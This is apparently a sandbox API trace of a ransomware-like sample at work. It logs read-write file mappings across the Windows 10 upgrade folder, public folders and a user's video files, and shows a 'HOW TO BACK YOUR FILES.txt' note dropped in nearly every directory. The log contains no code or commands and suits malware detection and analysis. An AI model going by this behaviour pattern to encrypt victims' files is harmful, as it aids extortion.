Create Mapping C:\Windows10Upgrade\upgrader_win10.log filename = C:\Windows10Upgrade\upgrader_win10.log, protection = PAGE_READWRITE, maximum_size = 21328 True 1
Fn
Create Mapping C:\Windows10Upgrade\Windows10UpgraderApp.exe filename = C:\Windows10Upgrade\Windows10UpgraderApp.exe, protection = PAGE_READWRITE, maximum_size = 1416656 True 1
Fn
Create Mapping Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt filename = Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\WinREBootApp32.exe filename = C:\Windows10Upgrade\WinREBootApp32.exe, protection = PAGE_READWRITE, maximum_size = 26064 True 1
Fn
Create Mapping C:\Windows10Upgrade\WinREBootApp64.exe filename = C:\Windows10Upgrade\WinREBootApp64.exe, protection = PAGE_READWRITE, maximum_size = 26576 True 1
Fn
Create Mapping C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\hwcompatShared.txt filename = C:\Windows10Upgrade\resources\hwcompatShared.txt, protection = PAGE_READWRITE, maximum_size = 826144 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\block.png filename = C:\Windows10Upgrade\resources\ux\block.png, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\bluelogo.png filename = C:\Windows10Upgrade\resources\ux\bluelogo.png, protection = PAGE_READWRITE, maximum_size = 7856 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\bullet.png filename = C:\Windows10Upgrade\resources\ux\bullet.png, protection = PAGE_READWRITE, maximum_size = 992 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default.css filename = C:\Windows10Upgrade\resources\ux\default.css, protection = PAGE_READWRITE, maximum_size = 6544 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default.htm filename = C:\Windows10Upgrade\resources\ux\default.htm, protection = PAGE_READWRITE, maximum_size = 63312 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_eos.css filename = C:\Windows10Upgrade\resources\ux\default_eos.css, protection = PAGE_READWRITE, maximum_size = 7472 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_eos.htm filename = C:\Windows10Upgrade\resources\ux\default_eos.htm, protection = PAGE_READWRITE, maximum_size = 56640 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_oobe.css filename = C:\Windows10Upgrade\resources\ux\default_oobe.css, protection = PAGE_READWRITE, maximum_size = 6000 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\default_oobe.htm filename = C:\Windows10Upgrade\resources\ux\default_oobe.htm, protection = PAGE_READWRITE, maximum_size = 66480 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\eula.css filename = C:\Windows10Upgrade\resources\ux\eula.css, protection = PAGE_READWRITE, maximum_size = 864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\GetStarted.png filename = C:\Windows10Upgrade\resources\ux\GetStarted.png, protection = PAGE_READWRITE, maximum_size = 4592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png filename = C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png, protection = PAGE_READWRITE, maximum_size = 4848 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\loading.gif filename = C:\Windows10Upgrade\resources\ux\loading.gif, protection = PAGE_READWRITE, maximum_size = 18176 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\lock.png filename = C:\Windows10Upgrade\resources\ux\lock.png, protection = PAGE_READWRITE, maximum_size = 4448 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\logo.png filename = C:\Windows10Upgrade\resources\ux\logo.png, protection = PAGE_READWRITE, maximum_size = 3392 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\marketing.png filename = C:\Windows10Upgrade\resources\ux\marketing.png, protection = PAGE_READWRITE, maximum_size = 1264 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht filename = C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht, protection = PAGE_READWRITE, maximum_size = 622864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png filename = C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png, protection = PAGE_READWRITE, maximum_size = 2944 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png filename = C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png, protection = PAGE_READWRITE, maximum_size = 2992 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\pass.png filename = C:\Windows10Upgrade\resources\ux\pass.png, protection = PAGE_READWRITE, maximum_size = 2592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js, protection = PAGE_READWRITE, maximum_size = 1284304 True 1
Fn
Create Mapping C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js, protection = PAGE_READWRITE, maximum_size = 3047616 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\BiosBlocks.xml filename = C:\Windows10Upgrade\resources\i386\BiosBlocks.xml, protection = PAGE_READWRITE, maximum_size = 92416 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\hwcompat.txt filename = C:\Windows10Upgrade\resources\i386\hwcompat.txt, protection = PAGE_READWRITE, maximum_size = 17280 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\hwexclude.txt filename = C:\Windows10Upgrade\resources\i386\hwexclude.txt, protection = PAGE_READWRITE, maximum_size = 3040 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\nxquery.cat filename = C:\Windows10Upgrade\resources\i386\nxquery.cat, protection = PAGE_READWRITE, maximum_size = 10640 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\nxquery.inf filename = C:\Windows10Upgrade\resources\i386\nxquery.inf, protection = PAGE_READWRITE, maximum_size = 2272 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\i386\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\i386\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css, protection = PAGE_READWRITE, maximum_size = 41728 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css, protection = PAGE_READWRITE, maximum_size = 269936 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm, protection = PAGE_READWRITE, maximum_size = 111216 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm, protection = PAGE_READWRITE, maximum_size = 254224 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm, protection = PAGE_READWRITE, maximum_size = 84096 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm, protection = PAGE_READWRITE, maximum_size = 65952 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm, protection = PAGE_READWRITE, maximum_size = 71232 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm, protection = PAGE_READWRITE, maximum_size = 240224 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm, protection = PAGE_READWRITE, maximum_size = 59328 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm, protection = PAGE_READWRITE, maximum_size = 59328 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm, protection = PAGE_READWRITE, maximum_size = 70592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm, protection = PAGE_READWRITE, maximum_size = 70592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm, protection = PAGE_READWRITE, maximum_size = 63872 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm, protection = PAGE_READWRITE, maximum_size = 71520 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm, protection = PAGE_READWRITE, maximum_size = 70160 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm, protection = PAGE_READWRITE, maximum_size = 70160 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm, protection = PAGE_READWRITE, maximum_size = 865424 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm, protection = PAGE_READWRITE, maximum_size = 65648 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm, protection = PAGE_READWRITE, maximum_size = 85344 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm, protection = PAGE_READWRITE, maximum_size = 70256 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm, protection = PAGE_READWRITE, maximum_size = 211024 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm, protection = PAGE_READWRITE, maximum_size = 634864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm, protection = PAGE_READWRITE, maximum_size = 76864 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm, protection = PAGE_READWRITE, maximum_size = 84688 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm, protection = PAGE_READWRITE, maximum_size = 67968 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm, protection = PAGE_READWRITE, maximum_size = 68000 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm, protection = PAGE_READWRITE, maximum_size = 82592 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm, protection = PAGE_READWRITE, maximum_size = 69072 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm, protection = PAGE_READWRITE, maximum_size = 71824 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm, protection = PAGE_READWRITE, maximum_size = 78944 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm, protection = PAGE_READWRITE, maximum_size = 284624 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm, protection = PAGE_READWRITE, maximum_size = 82736 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm, protection = PAGE_READWRITE, maximum_size = 66928 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm, protection = PAGE_READWRITE, maximum_size = 76320 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm, protection = PAGE_READWRITE, maximum_size = 71168 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm, protection = PAGE_READWRITE, maximum_size = 254928 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm, protection = PAGE_READWRITE, maximum_size = 75920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm, protection = PAGE_READWRITE, maximum_size = 267504 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm, protection = PAGE_READWRITE, maximum_size = 127024 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm, protection = PAGE_READWRITE, maximum_size = 147920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm filename = C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm, protection = PAGE_READWRITE, maximum_size = 147920 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml filename = C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml, protection = PAGE_READWRITE, maximum_size = 94656 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\hwcompat.txt filename = C:\Windows10Upgrade\resources\amd64\hwcompat.txt, protection = PAGE_READWRITE, maximum_size = 73904 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\hwexclude.txt filename = C:\Windows10Upgrade\resources\amd64\hwexclude.txt, protection = PAGE_READWRITE, maximum_size = 3088 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\nxquery.cat filename = C:\Windows10Upgrade\resources\amd64\nxquery.cat, protection = PAGE_READWRITE, maximum_size = 10688 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\nxquery.inf filename = C:\Windows10Upgrade\resources\amd64\nxquery.inf, protection = PAGE_READWRITE, maximum_size = 2272 True 1
Fn
Create Mapping C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt filename = C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\HOW TO BACK YOUR FILES.txt filename = C:\Users\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Libraries\RecordedTV.library-ms filename = C:\Users\Public\Libraries\RecordedTV.library-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\54be.flv filename = C:\Users\FD1HVy\Videos\54be.flv, protection = PAGE_READWRITE, maximum_size = 35840 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\7GblG1j-U_m.avi filename = C:\Users\FD1HVy\Videos\7GblG1j-U_m.avi, protection = PAGE_READWRITE, maximum_size = 90288 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\hafWBqXU o.swf filename = C:\Users\FD1HVy\Videos\tKr\hafWBqXU o.swf, protection = PAGE_READWRITE, maximum_size = 58224 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\LgD6JoRdSVkauQ4AZ.mkv filename = C:\Users\FD1HVy\Videos\tKr\LgD6JoRdSVkauQ4AZ.mkv, protection = PAGE_READWRITE, maximum_size = 67616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\p_iTlT1Y7Bmx3OF.swf filename = C:\Users\FD1HVy\Videos\tKr\p_iTlT1Y7Bmx3OF.swf, protection = PAGE_READWRITE, maximum_size = 92208 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\SOffZObMNcI-W_M.mkv filename = C:\Users\FD1HVy\Videos\tKr\SOffZObMNcI-W_M.mkv, protection = PAGE_READWRITE, maximum_size = 92352 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\VCm0_y.mkv filename = C:\Users\FD1HVy\Videos\tKr\VCm0_y.mkv, protection = PAGE_READWRITE, maximum_size = 27376 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\W681BwserRy_0.avi filename = C:\Users\FD1HVy\Videos\tKr\W681BwserRy_0.avi, protection = PAGE_READWRITE, maximum_size = 82224 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\tKr\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\tKr\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\l0I0AT.swf filename = C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\l0I0AT.swf, protection = PAGE_READWRITE, maximum_size = 102640 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\_cqQP-g.mkv filename = C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\_cqQP-g.mkv, protection = PAGE_READWRITE, maximum_size = 92288 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\Mr9We2Kb5L1oUgPF84r\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\1NoZ-i.avi filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\1NoZ-i.avi, protection = PAGE_READWRITE, maximum_size = 86592 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\4-CHQqK1j2.avi filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\4-CHQqK1j2.avi, protection = PAGE_READWRITE, maximum_size = 53776 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\JPgmUVeD.mp4 filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\JPgmUVeD.mp4, protection = PAGE_READWRITE, maximum_size = 41680 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\Ui7VnDgLzhug.flv filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\Ui7VnDgLzhug.flv, protection = PAGE_READWRITE, maximum_size = 12544 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\VuG piDpw9ji.mkv filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\VuG piDpw9ji.mkv, protection = PAGE_READWRITE, maximum_size = 68864 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\znnVwfJyK03KyEgu5yk.flv filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\znnVwfJyK03KyEgu5yk.flv, protection = PAGE_READWRITE, maximum_size = 86288 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Kagr0\BDCHN3cxOVU.avi filename = C:\Users\FD1HVy\Videos\Kagr0\BDCHN3cxOVU.avi, protection = PAGE_READWRITE, maximum_size = 83888 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Kagr0\G50GPz.flv filename = C:\Users\FD1HVy\Videos\Kagr0\G50GPz.flv, protection = PAGE_READWRITE, maximum_size = 97424 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Kagr0\tRYgRmfMiyo_fA kpl4-.flv filename = C:\Users\FD1HVy\Videos\Kagr0\tRYgRmfMiyo_fA kpl4-.flv, protection = PAGE_READWRITE, maximum_size = 34496 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\Kagr0\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\Kagr0\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf filename = C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf, protection = PAGE_READWRITE, maximum_size = 53264 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\IGecK\Dl_2E.mp4 filename = C:\Users\FD1HVy\Videos\IGecK\Dl_2E.mp4, protection = PAGE_READWRITE, maximum_size = 85984 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\IGecK\tPmIDjSq0JZ6KPmq.mp4 filename = C:\Users\FD1HVy\Videos\IGecK\tPmIDjSq0JZ6KPmq.mp4, protection = PAGE_READWRITE, maximum_size = 75904 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\IGecK\WwiHK0yV6.flv filename = C:\Users\FD1HVy\Videos\IGecK\WwiHK0yV6.flv, protection = PAGE_READWRITE, maximum_size = 43872 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\IGecK\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Videos\IGecK\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ahcaYgdd_uS\2SeeX7efa.avi filename = C:\Users\FD1HVy\Videos\ahcaYgdd_uS\2SeeX7efa.avi, protection = PAGE_READWRITE, maximum_size = 44816 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ahcaYgdd_uS\dIBFcA.flv filename = C:\Users\FD1HVy\Videos\ahcaYgdd_uS\dIBFcA.flv, protection = PAGE_READWRITE, maximum_size = 86528 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ahcaYgdd_uS\Hs7jFAf-QpkayKL1.mp4 filename = C:\Users\FD1HVy\Videos\ahcaYgdd_uS\Hs7jFAf-QpkayKL1.mp4, protection = PAGE_READWRITE, maximum_size = 101088 True 1
Fn
Create Mapping C:\Users\FD1HVy\Videos\ahcaYgdd_uS\qIBn Mru7Ws.mkv filename = C:\Users\FD1HVy\Videos\ahcaYgdd_uS\qIBn Mru7Ws.mkv, protection = PAGE_READWRITE, maximum_size = 13936 True 1
